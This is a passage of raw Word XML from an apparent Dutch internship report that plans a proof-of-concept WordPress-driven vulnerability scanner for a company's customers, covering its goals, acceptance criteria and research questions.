            <w:r w:rsidR="004A6DAA">
              <w:t xml:space="preserve">Ook wilt S5 </w:t>
            </w:r>
            <w:r w:rsidR="007805D9">
              <w:t>hun service-</w:t>
            </w:r>
            <w:r w:rsidR="00296935">
              <w:t>aanbod uitbreiden op gebied van security</w:t>
            </w:r>
            <w:r w:rsidR="00DA590A">
              <w:t xml:space="preserve"> door het aanbieden van een gratis securityscan.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A55164" w14:paraId="13095662" w14:textId="77777777" w:rsidTr="00A55164">
        <w:trPr>
          <w:trHeight w:val="1271"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1887" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="519692F8" w14:textId="3099EE29" w:rsidR="00BB67B2" w:rsidRDefault="00556574" w:rsidP="006822D8">
            <w:r>
              <w:t>Project doel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8028" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18912371" w14:textId="2E37F907" w:rsidR="00BB67B2" w:rsidRDefault="00DA590A" w:rsidP="006822D8">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Het ontwikkelen van een proof of concept van een webapplicatie scanner</w:t>
            </w:r>
            <w:r w:rsidR="002E4A6B">
              <w:t xml:space="preserve"> dat met een Wordpress extensie bedient kan worden.</w:t>
            </w:r>
            <w:r w:rsidR="002B773A">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="009B7B7F">
              <w:t>Klanten kunnen gebruiken maken van de Wordpress extensie om security scans aan te vragen</w:t>
            </w:r>
            <w:r w:rsidR="00A15040">
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A55164" w14:paraId="170D4AB9" w14:textId="77777777" w:rsidTr="00A55164">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87" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6843A725" w14:textId="27ECFD15" w:rsidR="00BB67B2" w:rsidRDefault="00556574" w:rsidP="006822D8">
            <w:r>
              <w:t>Project acceptatiecriteria</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8028" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="509EFA0C" w14:textId="77777777" w:rsidR="00BB67B2" w:rsidRDefault="001075F7" w:rsidP="006822D8">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Het systeem van de Proof of Concept zal aan de volgende eisen moeten voldoen;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FE771BF" w14:textId="77777777" w:rsidR="001075F7" w:rsidRDefault="001075F7" w:rsidP="006822D8">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7D039402" w14:textId="76081401" w:rsidR="001075F7"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Een Wordpress extensie waarmee scans aangevraagd kunnen worden.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FCA8811" w14:textId="77777777" w:rsidR="001075F7" w:rsidRDefault="00BF6FAE"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Webapplicatie scanner</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A074094" w14:textId="77777777" w:rsidR="00BF6FAE"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webapplicatie scanner scant op m</w:t>
            </w:r>
            <w:r w:rsidR="006B50DA">
              <w:t xml:space="preserve">inimaal 3 </w:t>
            </w:r>
            <w:r>
              <w:t>kwetsbaarheden</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54593477" w14:textId="77777777" w:rsidR="00A55164"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webapplicatie scanner genereerd een rapport op basis van de geïdentificeerde kwetsbaarheden.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06702377" w14:textId="7D3EA978" w:rsidR="00A55164"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gegenereerde rapporten worden via een Mailing service opgestuurd naar de klant.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A55164" w14:paraId="0635EFF2" w14:textId="77777777" w:rsidTr="00A55164">
        <w:trPr>
          <w:trHeight w:val="1522"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1887" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73F86169" w14:textId="57D2D069" w:rsidR="00BB67B2" w:rsidRDefault="00556574" w:rsidP="006822D8">
            <w:r>
              <w:t>Project beperkingen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8028" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F539DA9" w14:textId="4E716B42" w:rsidR="00BC24DD" w:rsidRDefault="00BC24DD" w:rsidP="00360217">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et is een individueel project.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D77222F" w14:textId="34538F34" w:rsidR="00BC24DD" w:rsidRDefault="00BC24DD" w:rsidP="00BC24D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et systeem wordt ontwikkeld in een PHP Framework en zal gekoppeld worden aan een SQL-database.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A798002" w14:textId="77777777" w:rsidR="00BC24DD" w:rsidRDefault="00BC24DD" w:rsidP="006822D8">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1ABE00EB" w14:textId="1166BD41" w:rsidR="00BC24DD" w:rsidRDefault="00BC24DD" w:rsidP="00BC24DD">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="273DAA13" w14:textId="65E1CC19" w:rsidR="00CF222D" w:rsidRDefault="005864CF" w:rsidP="006822D8">
      <w:r>
        <w:t>Tabel 1.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A112F3" w14:textId="6847A316" w:rsidR="00794923" w:rsidRDefault="00DD0876" w:rsidP="006822D8">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5821DDF6" w14:textId="77777777" w:rsidR="00BD5AD1" w:rsidRDefault="00BD5AD1" w:rsidP="00932393">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02B62503" w14:textId="50DF4729" w:rsidR="000D1677" w:rsidRPr="00932393" w:rsidRDefault="00394B19" w:rsidP="00932393">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252120064" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="514A8EAA" wp14:editId="15479D7E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-904734</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-897961</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="38" name="Rectangle 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3343B" id="Rectangle 38" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.25pt;margin-top:-70.65pt;width:25pt;height:1031.7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Xkb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" fillcolor="#c5e0b3 [1305]" strokecolor="#c5e1b4" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00FD002D">
        <w:t xml:space="preserve">1.4 </w:t>
      </w:r>
      <w:r w:rsidR="006822D8" w:rsidRPr="006D01D5">
        <w:t>Onderzoek opzet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43476B34" w14:textId="0E8848D2" w:rsidR="000E4EE1" w:rsidRDefault="00EC6D3C" w:rsidP="006822D8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Business Context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06046C84" w14:textId="69EFC8BC"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0DA8D80D" w14:textId="19F80B17" w:rsidR="00D36FA0" w:rsidRDefault="00650BF0" w:rsidP="006822D8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Webapplicatie scanners</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8D5415" w14:textId="22312B4C"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t>
      </w:r>
      <w:r w:rsidR="00650BF0">
        <w:t>webapplicatie scanner</w:t>
      </w:r>
      <w:r w:rsidR="00581946">
        <w:t xml:space="preserve">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663BC18D" w:rsidR="003724D2" w:rsidRDefault="006822D8" w:rsidP="006822D8">
      <w:r>
        <w:t>Ik heb tijdens het solliciteren ook specif</w:t>
      </w:r>
      <w:r w:rsidR="007805D9">
        <w:t>iek gezocht naar stages die PHP-</w:t>
      </w:r>
      <w:r>
        <w:t>opdrachten aanbieden. S5 bestaat uit twee afdelingen PHP en C#, ik zit aan de PHP kan, wat betekent dat mijn directe collega’s die mij onderst</w:t>
      </w:r>
      <w:r w:rsidR="00CA7C84">
        <w:t>eunen in het ontwikkelen van de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> softwareapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="007805D9">
        <w:t xml:space="preserve"> gespecialiseerd zijn in de PHP-</w:t>
      </w:r>
      <w:r>
        <w:t>programmeertaal. Om deze twee redenen is het vrij logisch dat ik voor een PHP Framework heb gekozen. PHP biedt heel wat Web Application Frameworks aan waaronder Laravel, Slim, Symfony, Zend, Phalcon, Yii. Maar welke is het best geschikt voor het project?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E5153B" w14:textId="04958737" w:rsidR="00B324F9"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25791FAF" w14:textId="22A99AED" w:rsidR="00D65049" w:rsidRDefault="00D65049" w:rsidP="006822D8"/>
    <w:p w14:paraId="377AFA4C" w14:textId="77777777" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="006822D8"/>
    <w:p w14:paraId="028EF20A" w14:textId="77777777" w:rsidR="00354798" w:rsidRDefault="00354798">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="214E6914" w14:textId="77777777" w:rsidR="00BD5AD1" w:rsidRDefault="00BD5AD1" w:rsidP="00BA2E92">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03E0F933" w14:textId="4001153F" w:rsidR="006822D8" w:rsidRPr="00D82484" w:rsidRDefault="00394B19" w:rsidP="00BA2E92">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252122112" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="74B8F37D" wp14:editId="4632BB0E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-901700</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1015083</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="39" name="Rectangle 3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91C80" id="Rectangle 39" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71pt;margin-top:-79.9pt;width:25pt;height:1031.7pt;z-index:-2511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" fillcolor="#c5e0b3 [1305]" strokecolor="#c5e1b4" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006822D8">
        <w:t xml:space="preserve">1.5 </w:t>
      </w:r>
      <w:r w:rsidR="006822D8" w:rsidRPr="00D82484">
        <w:t>Project context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C4C6DB" w14:textId="3679C8B0" w:rsidR="006822D8" w:rsidRPr="002203B6" w:rsidRDefault="006822D8" w:rsidP="006822D8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002203B6">
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Doelstelling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2576EC" w14:textId="5E14D853" w:rsidR="00F6370B" w:rsidRPr="00354798" w:rsidRDefault="006822D8" w:rsidP="00354798">
      <w:r>
        <w:t xml:space="preserve">Het doel is om een Proof Of Concept te ontwikkelen voor een </w:t>
      </w:r>
      <w:r w:rsidR="005E1F2B">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="00650BF0">
        <w:t>ebapplicatie scanner</w:t>
      </w:r>
      <w:r w:rsidR="005E1F2B">
        <w:t xml:space="preserve"> waar </w:t>
      </w:r>
      <w:r w:rsidR="007063AC">
        <w:t>iedere website-eigenaar gebruik van kan maken om hun website</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> op kwetsbaarheden te kunnen laten scannen.</w:t>
      </w:r>
      <w:r w:rsidR="008104ED">
        <w:t xml:space="preserve"> De webapplicatie scanner wordt met een Wordpress extensie bedient</w:t>
      </w:r>
      <w:r w:rsidR="00632A13">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">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1DB4E2F5" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="006822D8">
      <w:r>
        <w:t>De opdracht is het onderzoeken en ontwikkelen van een s</w:t>
      </w:r>
      <w:r w:rsidR="003B78B2">
        <w:t xml:space="preserve">ysteem dat WordPress </w:t>
      </w:r>
      <w:r>
        <w:t>website scant op kwetsbaarheden.</w:t>
      </w:r>
      <w:r w:rsidR="005C045F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>De opdracht zal bestaan uit drie su</w:t>
      </w:r>
      <w:r w:rsidR="005E1F2B">
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">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4CAA2B3B" w:rsidR="006822D8" w:rsidRDefault="00E90C9E" w:rsidP="006822D8">
      <w:r>
        <w:t xml:space="preserve">Hoe </w:t>
      </w:r>
      <w:r w:rsidR="006822D8">
        <w:t>kan ik een MVP van een geauto</w:t>
      </w:r>
      <w:r w:rsidR="00DB461D">
        <w:t xml:space="preserve">matiseerde </w:t>
      </w:r>
      <w:r w:rsidR="00650BF0">
        <w:t>webapplicatie scanner</w:t>
      </w:r>
      <w:r w:rsidR="00DB461D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006822D8">
        <w:t>ontwikkelen</w:t>
      </w:r>
      <w:r w:rsidR="00412A53">
        <w:t>, die kwetsbaarheden identificeert</w:t>
      </w:r>
      <w:r w:rsidR="001332B0">
        <w:t xml:space="preserve"> van Wordpress website</w:t>
      </w:r>
      <w:r w:rsidR="00412A53">
        <w:t xml:space="preserve"> en op basis daarvan een rapport genereert,</w:t>
      </w:r>
      <w:r w:rsidR="006822D8">
        <w:t xml:space="preserve"> waar de klanten van S5 gratis gebruik van kunnen maken?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7B50AE" w14:textId="77777777" w:rsidR="006822D8" w:rsidRPr="00F33B60" w:rsidRDefault="006822D8" w:rsidP="006822D8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F33B60">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Deelvragen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B894103" w14:textId="0A2C6F4F" w:rsidR="0047039D" w:rsidRPr="0047039D" w:rsidRDefault="0055327A" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Voor wie is de </w:t>
      </w:r>
      <w:r w:rsidR="009B5D87">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="00650BF0">
        <w:t>ebapplicatie scanner</w:t>
      </w:r>
      <w:r w:rsidR="0047039D">
        <w:t xml:space="preserve"> bedoelt?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD2E9CB" w14:textId="0104A1F5" w:rsidR="006822D8" w:rsidRPr="0055327A" w:rsidRDefault="0055327A" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0055327A">
        <w:t xml:space="preserve">Wat is een </w:t>
      </w:r>
      <w:r w:rsidR="00B81DCC">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="00650BF0">
        <w:t>ebapplicatie scanner</w:t>
      </w:r>
      <w:r w:rsidR="006822D8" w:rsidRPr="0055327A">
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C52872D" w14:textId="265A01DC" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Wat zijn de tools en technieken die ik kan gebruiken bij het ontwikkelen van een</w:t>
      </w:r>
      <w:r w:rsidR="00DC7258">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B81DCC">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="00650BF0">
        <w:t>ebapplicatie scanner</w:t>
      </w:r>
      <w:r>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EFC937" w14:textId="161E91DF" w:rsidR="00EF79AD" w:rsidRDefault="006822D8" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hoe ziet </w:t>
      </w:r>
      <w:r w:rsidR="00F65A7A">
        <w:t>het</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> c</w:t>
      </w:r>
      <w:r w:rsidR="00B602A8">
        <w:t xml:space="preserve">oncept eruit van de </w:t>
      </w:r>
      <w:r w:rsidR="00B81DCC">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="00650BF0">
        <w:t>ebapplicatie scanner</w:t>
      </w:r>
      <w:r>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A961569" w14:textId="5AC01E08" w:rsidR="00EF79AD" w:rsidRDefault="00EF79AD" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:sectPr w:rsidR="00EF79AD" w:rsidSect="00D371DB">
          <w:headerReference w:type="default" r:id="rId21"/>
          <w:headerReference w:type="first" r:id="rId22"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="0" w:right="1418" w:bottom="0" w:left="1418" w:header="709" w:footer="709" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:t>Hoe ziet het eindproduct eruit?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6CB452" w14:textId="59B01B59" w:rsidR="00682377" w:rsidRDefault="00BD5AD1" w:rsidP="0042566C">
      <w:pPr>
        <w:ind w:left="-1417"/>
        <w:sectPr w:rsidR="00682377" w:rsidSect="007B3BEE">
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="0" w:right="1418" w:bottom="0" w:left="1418" w:header="709" w:footer="709" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252288000" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="369179FB" wp14:editId="44C28146">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-328295</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1680210</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4890135" cy="688340"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="574" name="Text Box 574"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4890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D4CE9" w14:textId="2395DAFC" w:rsidR="002A05E5" w:rsidRPr="00A14BEE" w:rsidRDefault="002A05E5"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79FB" id="Text Box 574" o:spid="_x0000_s1041" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-25.85pt;margin-top:132.3pt;width:385.05pt;height:54.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n/uX0CAABlBQAADgAAAGRycy9lMm9Eb2MueG1srFTdT9swEH+ftP/B8vtICy0r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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="153D4CE9" w14:textId="2395DAFC" w:rsidR="002A05E5" w:rsidRPr="00A14BEE" w:rsidRDefault="002A05E5"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v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252290048" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="305DBCCC" wp14:editId="5966B699">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-8890</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3288665</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4826635" cy="102806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826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895D7E0" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00435E58" w:rsidRDefault="002A05E5"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2A05E5" w:rsidRPr="00435E58" w:rsidRDefault="002A05E5" w:rsidP="002559E8">
                            <w:pPr>
                              <w:rPr>
                                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00435E58">
                              <w:rPr>
                                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                                <w:b/>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="32"/>
                              </w:rPr>
                              <w:t>Voor wie is de Webapplicatie scanner bedo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CCC" id="Text Box 200" o:spid="_x0000_s1042" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-.7pt;margin-top:258.95pt;width:380.05pt;height:80.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" filled="f" stroked="f" strokeweight="3pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5895D7E0" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00435E58" w:rsidRDefault="002A05E5"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2A05E5" w:rsidRPr="00435E58" w:rsidRDefault="002A05E5" w:rsidP="002559E8">
                      <w:pPr>
                        <w:rPr>
                          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00435E58">
                        <w:rPr>
                          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                          <w:b/>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          <w:sz w:val="32"/>
                        </w:rPr>
                        <w:t>Voor wie is de Webapplicatie scanner bedoelt?</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252291072" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="593005A2" wp14:editId="4A899DC7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-327695</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3059830</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5334635" cy="1483360"/>
                <wp:effectExtent l="0" t="0" r="24765" b="15240"/>
                <wp:wrapNone/>
                <wp:docPr id="201" name="Rounded Rectangle 20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1482" id="Rounded Rectangle 201" o:spid="_x0000_s1026" style="position:absolute;margin-left:-25.8pt;margin-top:240.95pt;width:420.05pt;height:116.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" filled="f" strokecolor="white [3212]" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
              </v:roundrect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252346368" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1C0473B2" wp14:editId="54161BF1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-201930</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>191770</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3556635" cy="630555"/>
